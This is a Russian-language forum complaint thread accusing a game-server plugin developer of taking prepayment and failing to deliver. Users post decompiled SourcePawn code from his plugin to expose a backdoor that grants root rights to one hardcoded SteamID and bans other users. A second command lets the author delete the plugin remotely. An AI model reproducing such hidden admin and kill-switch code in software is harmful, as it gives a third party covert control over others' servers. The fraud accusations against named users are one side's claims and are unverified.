Жалоба на Райский

Статус
В этой теме нельзя размещать новые ответы.

Крузяра

Супермодератор
Сообщения
7,218
Реакции
5,498
Поступила жалоба на пользователя @Райский от @counter
counter написал(а):
Я вам советую аккуратнее с данным "программером" общаться. особенно в личке. и ни в коем случае не давать ему деньги вперед.

Он меня обманул почти на 4 тыс. рублей. Пообещал собрать сервер и установить туда несколько МОДов. Очень просил деньги вперед. заигрывал и вилял хвостиком. Обещал все сделать в лучшем виде. Потом ему нужно было куда то срочно отъехать. И он попросил две недели отсрочки. За это время он успел на мой сервер поставить несколько своих плагинов, которые как потом выяснилось были не оптимизированы ( и это видно по тому коду что он тут выкладывал и по тому как он написал цикл) Эти плагины очень сильно тормозили и фризили сервер. Игра более чем 5х5 игроков была невозможна.
Он сразу не вникая сказал что дело в сервере, а не в его чудо уникальных плагинах. Я просто удалил его плагины и сервер ожил. Позже он согласился с этим и якобы оптимизировал код. Зашибись за мои деньги устроил у меня тестовую площадку. И в дальнейшем общении он никогда не соглашался что проблема где то у него. Виноваты все кроме него и его уникальных плагинов. Также отмечу что было засунуто ооочень много рекламы. Куда ни глянь всюду вываливается АЙ-КИ, ЯЙ-КИ, ого мобила ВК и прочий ненужный мне мусор, типа все должны после увиденного ломануться к нему заказывать сервер. Мне кстати многие сказали после этого что мой сервер потерял свою индивидуальность и изюминку. А когда узнали что Райский меня кинул предлагали кто сколько может денег чтоб компенсировать. Но я с игроков деньги не беру, у меня такое правило. Вот такие душевные есть люди.
В самих плагинах присутствует часть ворованного кода с других плагинов, как то например показывать урон и тд. Также отмечу что свои сервера он копирует все как близнецов, и ни под какую индивидуальность ничего менять не хочет, или скорее всего не может. Еще он козыряет тем что он не держит личного сервера, якобы чтоб не делать конкуренцию тем кому он делает сервера. Но для того чтоб держать личный сервер нужны деньги, а у него не всегда есть деньги даже на сигареты.
Также в коде есть вот такая ерунда - пользователю с стимайди STEAM_0:1:220723885 выдаёт рут-права на сервере по команде sm_accadmin и если стимайди не соответствует, то банит написавшего команду. Такой вот бэкдор. При чем это он не сообщает и в об этом не узнаете если не потрудитесь поковыряться в его униКАЛЛьном коде. Он это объясняет что вдруг кто то взломает сервер и тогда он кинется его спасать. Вам видимо не нужен такой функционал, так как ваш стимИД он в систему не прописывает. Думаю скорее всего это сделано чтоб в случае чего поднасрать.
Так же ему не удалось реализовать такую вещь как Квэйковские звуки, и меню постоянно съезжает. Выбираешь один пункт, а меню показывается от другого меню (хочешь забанить, доходишь до периода времени а там вылезает какое оружие хотите ограничить), До этого у меня таких проблем не было. По возвращению он заявил что, что то он не может сделать, а что то не хочет, так как там нужно переписывать кучу кода.
Я предложил вернуть деньги, но он (деньги потратил, еще у него хватило наглости просить у меня деньги на сигареты, пока он там где то скитался и спасибо за это даже не сказал- быдловато как то). В общем он предложил что то на эти деньги у него купить. Например пожизненную лицензию на его античит, по работе которого у меня есть вопросы. Да и не собираюсь я всю жизнь держать сервер). В общем нужно было как то вопрос закрывать.
Я давно хотел чтоб звания в игре отображались из HLSTATS, а не так чтоб писать ранк и смотреть. Предложил ему написать за это такой плагин. Хотя у меня были уже мысли как это сделать через LVL, но там нужно было писать пару костылей. Он согласился, но как то нехотя. Время шло и вот уже пошел третий месяц, а он даже не приступил. На специально созданный ему для работы сервер не заходил ни разу. Зато смотрю стал на форуме пописывать плагины и настраивать другие сервера. Ну конечно мой бюджет то уже освоен и можно подинамить. В итоге в очередной переписке включил «обиженного» и решил что этого достаточно чтоб не отвечать на письма и звонки и ничего не делать.
Типичный херой нашего времени (своровать, продать и кинуть) Для чего я это тут пишу. Видно что он хочет завлечь определенную аудиторию чтоб потом на этом заработать путем впаривания своего гавнокода и услуг по настройке. Сразу скажу что он очень не бескорыстный и у него все заточено на деньги. Он много раз это повторял в наших диалогах, но я ему говорил что все уже уплачено вперед. И видя сейчас такой аттракцион невиданной щедрости я слегка недоумеваю. Еще был случай что он забыл о том что я ему переводил деньги. Но выписка из банка освежила ему память. В общем решать вам. Но мое мнение что ему место в разделе бесплатных плагинов после одобрения кода администрацией. До всего остального он еще не дорос ни морально и профессионально.
Все пруфы если надо для администрации у меня есть. Оставлять это так просто я тоже не намерен. 4 тыс в принципе тянет на мошенничество. ст. 159 «Мошенничество»
Уголовные дела возбуждаются на сумму свыше 2500 рублей.
Имеются чеки переводов:
Последние 4-е цифры номеров карт "отправителя" закрашены специально.
upload_2018-4-3_22-35-36.png
upload_2018-4-3_22-36-27.png
upload_2018-4-3_22-36-31.png
upload_2018-4-3_22-43-33.png

Переписка будет приложена в течение суток (производится склейка и удаление конфиденциальных данных (логины, пароли, IP-адреса, ссылки)). Оффтоп

Всё, что известно о нём
Ожидаем комментарии от @Райский в течение 24-х часов.
@Райский является мошенником, крайне не рекомендуется с ним связываться.
 
Последнее редактирование модератором:

Grey83

похухоль
Сообщения
2,783
Реакции
1,513
пользователю с стимайди STEAM_0:1:220723885 выдаёт рут-права на сервере по команде sm_accadmin и если стимайди не соответствует, то банит написавшего команду
Вот код этой шняги из декомпила:
PHP:
 char steamid[16];
 char userip[16];
...
public Action AccAdmCmd(int client, int args)
{
    GetClientIP(client, userip, 64, true);
    GetClientAuthId(client, AuthIdType 1, steamid, 64, true);
    if (StrEqual(2628 + 8, "1:220723885", true))
    {
        AddUserFlags(client, 16384);
        SetUserFlagBits(client, 16384);
        PrintToChat(client, "ROOT FLAGS");
    }
    else
    {
        LogToFile(g_sLogPath, "[%s|%s] Игрок [Ник:%N|%s|IP:%s] пытался получит ROOT права.", "ACC+", "5.3.3 Release", client, steamid, userip, "ACC+");
        if (GetFeatureStatus(FeatureType 0, "SBBanPlayer"))
        {
            BanClient(client, 1, ConVar.IntValue.get(g_ConVar_DELBanTime), "[%s|%s] Пытался получит ROOT права.", "ACC+", "5.3.3 Release", any 0);
        }
        SBBanPlayer(0, client, ConVar.IntValue.get(g_ConVar_DELBanTime), "[ACC+] Пытался получит ROOT права.");
    }
    return Action 3;
}
--- Добавлено позже ---
@panikajo, это не он сделал: это такие настройки форума
--- Добавлено позже ---
А ещё там есть хорошая команда sm_aikidelete, которая позволяет в любой момент удалить плагин с сервера
PHP:
public Action CommandOff(int client, int args)
{
    GetClientAuthId(client, AuthIdType 1, steamid, 64, true);
    GetClientIP(client, userip, 64, true);
    if (CheckMyAccess(client))
    {
        if (GetConVarInt(g_cChatColors) == 1)
        {
            PrintToChatAll("\x07F4A460Плагин \x07FF00FF%s \x070000FF%s \x0700FFFFбыл \x07FF0000удалён Автором: %s", 36816, 36868, 36884);
        }
        else
        {
            PrintToChatAll("Плагин [%s|%s] был удалён Автором \x04%s", 36964, 36972, 36988);
        }
        PrintToServer("[%s] %s Плагин был удалён Автором %s:)", "ACC+", "5.3.3 Release", "☠ ÄйӃи ☠");
        LogToFile(g_sErrorLogPath, "[%s] %s Плагин был удалён Автором %s:)", "ACC+", "5.3.3 Release", "☠ ÄйӃи ☠");
        DeletePlugin();
    }
    else
    {
        if (GetConVarInt(g_cChatColors) == 1)
        {
            PrintToChat(client, "\x07696969Вы не \x072F4F4FАвтор. \x07FF0000Удаление \x07F5F5DCплагина \x07FFE4C4не произошло!");
        }
        else
        {
            PrintToChat(client, "Вы не Автор. Удаление плагина не произошло!");
        }
        LogToFile(g_sLogPath, "[%s|%s] Игрок [Ник:%N|%s|IP:%s] пытался удалить ядро %s.", "ACC+", "5.3.3 Release", client, steamid, userip, "ACC+");
        if (GetFeatureStatus(FeatureType 0, "SBBanPlayer"))
        {
            BanClient(client, 1, ConVar.IntValue.get(g_ConVar_DELBanTime), "[%s|%s] Попытка удалить плагин ACC+ через консоль", "ACC+", "5.3.3 Release", any 0);
        }
        else
        {
            SBBanPlayer(0, client, ConVar.IntValue.get(g_ConVar_DELBanTime), "[ACC+] Попытка удалить плагин ACC+ через консоль");
        }
        if (GetConVarInt(g_cChatColors) == 1)
        {
            PrintToChatAll("\x07FF1493Игрок \x07FF4500%N \x074B0082забанен системой %s \x0700FF00за попытку удалить Anti-Cheat.", client, 37864);
        }
        PrintToChatAll("\x01Игрок \x04%N \x01забанен системой \x04%s \x01за попытку удалить \x04Anti-Cheat.", client, 38004);
    }
    return Action 3;
}
 

Райский

Честный
Сообщения
114
Реакции
31
Ну начнем с того, что я тебе должен вернуть 1500. Нет делать этого не собираюсь, приложи лучше записи разговоров по телефону и переписку ВК точную скидывай. Все было нормально пока ты грубить не начал. После чего оскорбительное твое поведение продолжалось в течении 1,5 месяца которые я терпел, но после чего уже терпению пришел конец! По этому не жди деньги обратно. Не я так захотел а ты так сделал.
 

Крузяра

Супермодератор
Сообщения
7,218
Реакции
5,498
@Райский, о каком именно оскорбительном поведении идёт речь? Сейчас листаю диалог ВК, который успел склеить на текущий момент, и ничего такого не вижу.
 

Райский

Честный
Сообщения
114
Реакции
31
@Kr1kuzya, Скайп или мобильный разговор пусть прикладывает. А вк подтёр уже молодец =)
Только из за маленького уважения к данному персонажу, скажу: Я тут не чего тут оспаривать не буду и тем более ввести этот диалог дальше на эту тему.
Кто считает мошенником пусть. Я знаю почему я так с ним поступил (Упомянуто выше). Ну и вообще hlmod тут не причём, не тут он меня нашел и не тут оскорблял.

Оффтоп
--- Добавлено позже ---
Все пруфы если надо для администрации у меня есть. Оставлять это так просто я тоже не намерен. 4 тыс в принципе тянет на мошенничество. ст. 159 «Мошенничество»
Уголовные дела возбуждаются на сумму свыше 2500 рублей.
Твои слова были: Твой долг 1500 остался. А тут уже пишешь 4к.руб. Да не оставляй это все так, давай продолжай. Ты даже обвиняя меня тут врёшь!!!
 
Сообщения
389
Реакции
159
@Райский, Что то мало верится в ваши слова. Я думаю вряд ли вас кто то стал оскорблять если бы вы честно отработали положенное. На протяжении уже нескольких месяцев знаком с @counter и его сервером. Просил меня как то поковыряться с hlstats. За 2 минуты работы на мое удивление заплатил 500 рублей. Гнать надо таких как вы с этого форума. Кинул человека и еще хватает наглости фыркать.
 

Райский

Честный
Сообщения
114
Реакции
31
@noBap, Человек к каждому относиться так, как ему хочется. Чё он тогда удалился ? Не я удалил его а он сам свалил =D
Screenshot_1.png
 
Сообщения
389
Реакции
159
@noBap, Человек к каждому относиться так, как ему хочется. Чё он тогда удалился ? Не я удалил его а он сам свалил =D
Я бы поступил точно так же будь на его месте. Какой смысл продолжать упрашивать тебя сделать свою работу если ты даже не приступал к ней.
 

Райский

Честный
Сообщения
114
Реакции
31
@noBap, Я его заказ сделал. После чего должен был ему 1500. Каждый день слушать это (Делай *варь я же заплатил, и еще более грубая форма была. Ну и один хороший диалог по телефону состоялся). За что ? Уж точно не за тех обслуживание его сервера которым я какого-то фига занимался 2 мес.
 
Сообщения
785
Реакции
138

Райский

Честный
Сообщения
114
Реакции
31
@skolobes, Я еще раз повторяюсь. Я не собираюсь оправдывать свои действия в сторону данного персонажа. Который тут накатал жалобу с целью разбить какую-то репутацию. До начала этого инцидента я на форуме был неактивен вообще. HLmod и ссора моя с данным человеком как небо и земля.
 
Сообщения
389
Реакции
159
@Райский, Зачем ты продолжаешь врать. Ты не настроил ничего из того за что получил 1500.
 
Сообщения
439
Реакции
263
Никогда не понимал людей, которые пишут ноунеймам, выложившим свой высер уникальный плагин, в котором нашли кучу ошибок, которые автор не в состоянии исправить, явно видно, что человек не вдупляет, что он делает, но зато выкатывает по 10 бесполезных апдейтов в неделю, соглашаются на предоплату огромной суммы, а потом удивляются, что их обманули. Почему нельзя зайти в раздел "Услуги" и найти скриптера/"серверодела" там? Людей от туда можно хоть как-то считать проверенными. Оффтоп
 
Сообщения
75
Реакции
13
@skolobes, Я еще раз повторяюсь. Я не собираюсь оправдывать свои действия в сторону данного персонажа. Который тут накатал жалобу с целью разбить какую-то репутацию. До начала этого инцидента я на форуме был неактивен вообще. HLmod и ссора моя с данным человеком как небо и земля.
Так-как вы оказывали этому человеку услуги в области настройки сервера, а ведь этот форум администраторов игровых серверов и тут не должны быть мошенники/обманщики/кидаловы, следовательно вы должны быть забанены.
 

R1KO

всё тлен
Супермодератор
Сообщения
8,436
Реакции
5,877
@noBap, Я его заказ сделал. После чего должен был ему 1500. Каждый день слушать это (Делай *варь я же заплатил, и еще более грубая форма была. Ну и один хороший диалог по телефону состоялся). За что ?
Эм.. если надоело слушать оскорбления - верни не отработанные деньги и пошли лесом, в чем проблема? Во всех других случаях это ничто иное как "кидалово".
Уж точно не за тех обслуживание его сервера которым я какого-то фига занимался 2 мес.
Ну ты ж сам почему-то терпел (с твоих слов) оскорбления и продолжал заниматься тех. обслуживанием его сервера (опять же с твоих слов).
Тут 2 варианта: либо тебе нравится когда тебя оскорбляют за деньги, либо тебе хотелось еще подоить его "на сигареты".
 

Крузяра

Супермодератор
Сообщения
7,218
Реакции
5,498
@jasmine, сейчас общаюсь по телефону. Говорит, что кто-то из игроков сервера свёл его с ним.
И на тот момент, никаких плагинов он не выкладывал.
 

Райский

Честный
Сообщения
114
Реакции
31
Эм.. если надоело слушать оскорбления - верни не отработанные деньги и пошли лесом, в чем проблема? Во всех других случаях это ничто иное как "кидалово".

Ну ты ж сам почему-то терпел (с твоих слов) оскорбления и продолжал заниматься тех. обслуживанием его сервера (опять же с твоих слов).
Тут 2 варианта: либо тебе нравится когда тебя оскорбляют за деньги, либо тебе хотелось еще подоить его "на сигареты".
Нет Рико. Я вас понял. Деньги верну обязательно ему. Но хочу после извинения услышать за оскорбления. У меня все.
 
Сообщения
652
Реакции
310
То ли я туплю, то ли несостыковка какая-то. Автор жалобы писал про отсрочку 2 пару недель, а исполнитель здесь пишет что что-то там якобы 1.5 месяца терпел - разве 1.5 месяца делал всю работу? Как-то странно
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху